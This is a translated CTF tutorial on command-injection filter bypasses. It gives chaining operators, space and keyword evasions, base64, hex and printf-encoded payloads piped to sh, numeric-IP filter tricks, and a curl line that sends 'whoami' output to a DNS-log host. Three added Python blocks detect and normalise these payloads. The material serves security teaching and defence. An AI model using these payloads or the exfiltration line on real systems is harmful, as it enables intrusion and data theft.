
What are the ways to bypass command execution in CTF

2025-04-01 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

The editor shares here the ways of bypassing filters on command execution in CTF challenges. I believe most people do not know much about this, so the article is shared for your reference; I hope you learn a lot from reading it. Let's get to it!

For reference, study and use only

0x01: pipe symbol

When using Linux commands, we can execute several commands on one line, or execute the next command only under a condition. This section explains the use of the semicolon, of && and &, and of | and || in Linux commands.

Semicolon usage

Method: command1; command2

Separate commands with the ; sign. The commands run in order from left to right, and every command is executed regardless of whether an earlier one failed.

"|" pipe symbol usage

The output of the previous command becomes the input of the next command. In a CTF: ping 127.0.0.1 | ls (in effect only the result of ls is shown; the output of ping is handed to ls, which ignores it)

Method: command1 | command2

The pipe character "|" provided by Linux separates the two commands, and the output of the command on the left side of the pipe character is used as the input of the command on the right side of the pipe character. Continuous use of pipes means that the output of the first command is used as the input of the second command, the output of the second command is used as the input of the third command, and so on.

Take advantage of a pipe:

# rpm -qa | grep licq

This command creates a pipe with the pipe character "|". The pipeline lists the RPM packages whose names contain "licq" by taking the output of rpm -qa (all RPM packages installed on the system) as the input of the grep command.

Take advantage of multiple pipes:

# cat /etc/passwd | grep /bin/bash | wc -l

This command uses two pipes. The first pipe sends the output of the cat command (the contents of the passwd file) to the grep command, which finds all lines containing "/bin/bash"; the second pipe sends the output of grep to the wc command, which counts the number of input lines. The command therefore finds out how many users on the system use bash.

The usage of "&" symbol

Usage in CTF: ping 127.0.0.1 & ls (ping is put into the background, so ls runs without waiting for it and its output appears first)

& is placed after the startup arguments to run the process in the background

Method: command1 &

By default a process runs in the foreground, occupying the shell so that we cannot do anything else. For processes that need no interaction we often want to start them in the background; appending '&' to the startup arguments achieves this.

The usage of "&&" symbol

Usage in CTF: ping 127.0.0.1 && ls (ls executes only if the ping command succeeds; with ping 1 && ls, ls will not execute)

When the shell executes a command it produces a return value, which is saved in the shell variable $?. When $? == 0 the execution succeeded; when $? == 1 the execution failed (I think any non-zero number counts; the return value is between 0 and 255).

Sometimes the next command depends on whether the previous command succeeded: for example, run another command only after one command succeeds, or only after it fails. The shell provides && and || to control this; it decides whether to run the following command based on the return value of the previous one.

The syntax format is as follows:

command1 && command2 [&& command3 ...]

Connecting commands with && implements logical AND.

Only if the command on the left of && returns true (return value $? == 0) is the command on the right of && executed.

As soon as a command returns false (return value $? == 1), the subsequent commands are not executed.

"||" symbol usage

The opposite of &&: command2 is executed only when the left side is false.

The function of logical OR

The syntax format is as follows:

command1 || command2 [|| command3 ...]

Connecting commands with "||" implements logical OR.

Only if the command on the left returns false (return value $? == 1) is the command on the right executed. This is the same as logical OR in C, that is, a short-circuit OR operation.

As soon as a command returns true (return value $? == 0), the subsequent commands are not executed; execution stops at the first command that returns true.

For example, using the ping command to decide whether a host is alive:

ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 || result=1
if [ "$result" == 0 ]; then echo "192.168.1.1 is UP!"; else echo "192.168.1.1 is DOWN!"; fi

Note that &> is written together, without a space.

0x02: some ways to bypass spaces under linux

{cat,flag.txt}

cat${IFS}flag.txt

cat$IFS$9flag.txt

cat key.php

Inline execution (command substitution):

Payload: cat$IFS$1`ls`

Inline execution takes the output of the command inside the backquotes `` as input to the preceding command, so when we enter the payload above it is equivalent to cat flag.php;cat index.php (every file that ls lists).

Use DNS log resolution:

Here is an online service that can be used directly: admin.dnslog.link. Register an account and you are assigned a subdomain that can be used.

|| curl http://`whoami`.xxxx.xxx (xxxx.xxx is the assigned subdomain)

In this way you will see the result come back on the service's page. (There is no demonstration here; the account has been forgotten.) The backquotes around whoami are there because the backquote is the special symbol for executing a command under Linux. For more information see:

http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ

Convert a network address to a numeric address

A network address has another representation: the dotted address 127.0.0.1 can be converted to the number 2130706433.

It can be accessed directly as

http://2130706433

or http://0x7F000001.

So an IP filter can be bypassed this way. Here is a conversion URL:

http://www.msxindl.com/tools/ip/ip_num.asp
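As an added example (my own code, not from the article), here is the defender's side of the numeric-address trick above. A filter that compares the raw string against "127.0.0.1" is bypassed by 2130706433 or 0x7F000001, so the check below first canonicalises every spelling with Python's ipaddress module and only then applies an allow-list. The function names canonical_ipv4 and is_public_target are this example's own.

```python
import ipaddress
from typing import Optional

# Added example, not code from the original article: normalise the spellings of an
# IPv4 address listed above (dotted quad, decimal integer, 0x-prefixed hexadecimal)
# before a filter decision is made. Function names are this example's own.


def canonical_ipv4(text: str) -> Optional[str]:
    """Return the dotted-quad form of `text`, or None if it is not an IPv4 address.

    "127.0.0.1", "2130706433" and "0x7F000001" all come back as "127.0.0.1".
    """
    s = text.strip()
    try:
        return str(ipaddress.IPv4Address(s))      # already a dotted quad
    except ipaddress.AddressValueError:
        pass
    try:
        n = int(s, 0)                             # base 0: plain decimal or 0x... hexadecimal
    except ValueError:
        return None
    if not 0 <= n <= 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(n))


def is_public_target(text: str) -> bool:
    """Allow-list check on the canonical form: reject loopback, private, link-local,
    multicast, reserved and unspecified ranges, whatever spelling was supplied."""
    dotted = canonical_ipv4(text)
    if dotted is None:
        return False
    addr = ipaddress.IPv4Address(dotted)
    return not (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


if __name__ == "__main__":
    for spelling in ("127.0.0.1", "2130706433", "0x7F000001", "8.8.8.8", "not-an-ip"):
        print(f"{spelling:>12} -> {canonical_ipv4(spelling)}  public={is_public_target(spelling)}")
```

The point of the design is that the comparison never sees the user's spelling: whatever form arrives, the decision is taken on the dotted-quad canonical value, so the three forms listed in the article all lead to the same verdict.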

Check file permissions, then grant permissions with chmod 777; the command names are split with quotes to get past keyword filters:

l's' -la

c'h'm'o'd 777 /filename

Commands in place of cat

cat: displays the file from the first line and outputs all of it

tac: displays the file in reverse, from the last line, and outputs all of it

more: displays the file one screen at a time, according to the window size

less: similar to more, but can also page backwards and search for strings

head: displays only the first few lines

tail: displays only the last few lines

nl: similar to cat -n, prints line numbers alongside the output

tailf: similar to tail -f

sort%20/flag reads the file (%20 is a URL-encoded space)

dir lists the files in the current directory

Fancy ways of reading file contents under Linux

PS: the goal is to get the content of flag.txt

static-sh reads the file:

static-sh ./flag.txt

# output result:

./flag.txt: line 1: flag{this_is_a_test}: not found

paste reads the file:

paste ./flag.txt /etc/passwd

# output result:

flag{this_is_a_test}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

diff reads the file:

diff ./flag.txt /etc/passwd

# output result:

1c1,45
< flag{this_is_a_test}
\ No newline at end of file
---
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync

od reads the file:

od -a ./flag.txt

# output result:

0000000   f   l   a   g   {   t   h   i   s   _   i   s   _   a   _   t
0000020   e   s   t   }
0000024

bzmore reads the file:

bzmore ./flag.txt

bzless reads the file:

bzless ./flag.txt

echo `bzless ./room.txt`

# output result:

-> ./flag.txt key.txt

wget operation for fetching the target for reading

wget url -P path

Some command delimiters

In Linux: %0a, %0d, ;, &, |, &&, ||

In Windows: %0a, &, |, and one more character that plays a magical role as a command delimiter inside a .bat file
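As an added example (my own code, not from the article), the following Python splits a value on the Linux delimiters listed above and in section 0x01 (%0a, %0d, ;, &, |, &&, ||), which is what a web application needs in order to notice that a parameter meant to hold one value, such as the host handed to ping, is being used to chain a second command. It also shows the hardened counterpart: validate the value and build an argv list for subprocess instead of letting a shell parse it. The names split_chain, injected_commands and ping_argv are this example's own.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Added example, not code from the original article: split a value on the command
# delimiters the article lists for Linux (%0a, %0d, ;, &, |, &&, ||) so that a web
# parameter meant to carry one value can be checked for a chained command.
# Function and pattern names are this example's own.

# Two-character operators come first in the alternation so "&&" is not split as "&", "&".
_DELIM = re.compile(r"(&&|\|\||;|\||&|\n|\r)")


def split_chain(value: str) -> List[Tuple[str, str]]:
    """Return [(operator, command), ...] in order; the first segment's operator is ''.

    %0a and %0d are URL-decoded first, which is the form in which a newline
    delimiter reaches a web application.
    """
    parts = _DELIM.split(unquote(value))
    segments: List[Tuple[str, str]] = []
    op = ""
    for i, piece in enumerate(parts):
        if i % 2:                      # odd positions hold the captured delimiter
            op = piece.replace("\n", "%0a").replace("\r", "%0d")
        elif piece.strip():            # even positions hold the command text
            segments.append((op, piece.strip()))
    return segments


def injected_commands(value: str) -> List[str]:
    """Every command that follows a delimiter: a non-empty list means the parameter
    is being used to chain a second command."""
    return [cmd for op, cmd in split_chain(value) if op]


# Hardened counterpart of "ping <user value>" run through a shell: validate the value
# against a strict host pattern and hand an argv list to subprocess.run(..., shell=False),
# so no shell ever interprets the delimiters above.
_HOST = re.compile(r"[A-Za-z0-9.-]{1,253}")


def ping_argv(host: str) -> Optional[List[str]]:
    """Return the argv list for a one-probe ping, or None if `host` is not a plain host."""
    if not _HOST.fullmatch(host):
        return None
    return ["ping", "-c", "1", "-w", "1", host]


if __name__ == "__main__":
    for sample in ("127.0.0.1", "127.0.0.1 | ls", "127.0.0.1 && ls", "127.0.0.1%0als"):
        print(f"{sample!r:22} segments={split_chain(sample)} argv={ping_argv(sample)}")
```

split_chain is for logging and detection; ping_argv is the fix. Once the value travels as one argv element, ;, |, && and the rest are ordinary characters to ping, which is why the allow-list regex rather than a deny-list of delimiters is the right check.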

When bash is filtered, use sh:

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

Splicing the flag name from variables, for example a=fl;b=ag.php;cat$IFS$1$a$b

There is a filter that the above method cannot bypass, roughly of the form

if (preg_match("/.*f.*l.*a.*g.*/", $ip)) { die("fxck your flag!"); }

(the letters f, l, a, g still appear in that order in the payload). We only need to change the order of the assignments: 1;a=ag.php;b=fl;cat$IFS$1$b$a

Encoding bypass

Base64:

echo YWJjZGU= | base64 -d    // prints abcde

echo Y2F0IGZsYWcucGhw | base64 -d | bash    // cat flag.php

echo Y2F0IGZsYWcucGhw | base64 -d | sh    // cat flag.php

Hex encoding bypass:

echo 63617420666c61672e706870 | xxd -r -p | bash    // cat flag.php

Unicode coding (octal and hex escapes via printf):

$(printf "\154\163")    // ls

$(printf "\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70")    // cat flag.php

Keywords can also be bypassed with single quotes and backslashes, for example cat fl''ag or cat fl\ag.

To sum up, the payloads are 1;a=ag.php;b=fl;cat$IFS$1$b$a and cat$IFS$1`ls`.

Then view the page source to get the flag.
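As an added example (my own code, not from the article), here is what a filter on the receiving side has to do with the rewritings listed in section 0x02, "Commands in place of cat", "When bash is filtered", the splicing trick and the encoding bypasses: undo them before matching. It reverses the space substitutes (${IFS}, $IFS$9, $IFS$1, {a,b} braces, %20), quote splitting (c'h'm'o'd, fl''ag, fl\ag), the $(printf "\x..") and echo <b64> | base64 -d | sh wrappers, and variables spliced as $b$a, then looks for the file-reading commands the article lists. naive_filter_blocks is the raw-string regex from the article, shown beside it so the difference is visible. All function and pattern names are this example's own, and the inputs in the demo are the article's payloads.

```python
import base64
import re
from typing import Dict, List
from urllib.parse import unquote

# Added example, not code from the original article: normalise a command string by
# undoing the obfuscations the article lists, then match on the normalised form.
# Function and pattern names are this example's own.

READERS = {"cat", "tac", "more", "less", "head", "tail", "nl", "tailf", "sort", "dir",
           "static-sh", "paste", "diff", "od", "bzmore", "bzless", "wget", "curl"}

_IFS = re.compile(r"\$\{IFS\}|\$IFS(?:\$\d)?")        # ${IFS}, $IFS, $IFS$9, $IFS$1
_BRACE = re.compile(r"\{([^{}]*,[^{}]*)\}")            # {cat,flag.txt}
_PRINTF = re.compile(r'\$\(printf\s+"([^"]*)"\)')      # $(printf "\154\163")
_B64_SH = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d\s*\|\s*(?:sh|bash)")
_ASSIGN = re.compile(r"\s*([A-Za-z_]\w*)=(\S*)\s*")    # a=fl


def _decode_printf(m: re.Match) -> str:
    try:   # printf's \NNN octal and \xHH escapes are the ones unicode_escape decodes
        return m.group(1).encode("latin-1").decode("unicode_escape")
    except ValueError:
        return m.group(0)


def _decode_b64(m: re.Match) -> str:
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError
        return m.group(0)


def _resolve_vars(s: str) -> str:
    """Apply a=...;b=... assignments to later $a / ${a} uses, whatever their order."""
    env: Dict[str, str] = {}
    out = []
    for seg in re.split(r"[;\n]", s):
        for name, val in env.items():
            seg = seg.replace("${%s}" % name, val).replace("$" + name, val)
        m = _ASSIGN.fullmatch(seg)
        if m:
            env[m.group(1)] = m.group(2)
        out.append(seg)
    return ";".join(out)


def normalize(cmd: str) -> str:
    s = unquote(cmd)                                           # %20, %0a, %0d
    s = _IFS.sub(" ", s)
    s = _BRACE.sub(lambda m: m.group(1).replace(",", " "), s)
    s = _PRINTF.sub(_decode_printf, s)                         # before backslashes are dropped
    s = _B64_SH.sub(_decode_b64, s)
    s = re.sub(r"\\(.)", r"\1", s).replace("'", "").replace('"', "")   # fl\ag, c'h'm'o'd
    s = _resolve_vars(s)
    return re.sub(r"[ \t]+", " ", s).strip()


def findings(cmd: str) -> List[str]:
    """File-reading commands, chmod, and the substring 'flag' found after normalising."""
    norm = normalize(cmd)
    hits = []
    for seg in norm.split(";"):
        words = seg.split()
        if not words:
            continue
        head = words[0].rsplit("/", 1)[-1]                     # /bin/cat -> cat
        if head in READERS:
            hits.append("reader:" + head)
        elif head == "chmod":
            hits.append("chmod")
    if "flag" in norm:
        hits.append("flag")
    return hits


def naive_filter_blocks(raw: str) -> bool:
    """The raw-string regex from the article, which reordering the assignments defeats."""
    return re.search(r".*f.*l.*a.*g.*", raw) is not None


if __name__ == "__main__":
    for payload in ("{cat,flag.txt}", "cat$IFS$9flag.txt", "c'h'm'o'd 777 /flag",
                    "echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh",
                    "1;a=ag.php;b=fl;cat$IFS$1$b$a", "ls -la"):
        print(f"{payload!r:48} naive={naive_filter_blocks(payload)!s:5} "
              f"normalised={normalize(payload)!r} findings={findings(payload)}")
```

The ordering inside normalize matters: printf escapes are decoded before the backslash-stripping step, and $IFS forms are replaced before the base64 pattern is tried, because echo$IFS$1...|base64$IFS$1-d|sh only looks like the wrapper once the spaces are back. The regex /.*f.*l.*a.*g.*/ fails on the reordered payload for exactly the reason the article gives, while the normalised form reads cat flag.php and is caught.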

That is all the content of this article entitled "What are the ways to bypass command execution in CTF?". Thank you for reading! I believe you now have some understanding of the topic; I hope the content shared here helps you, and if you want to learn more, welcome to follow the industry information channel!
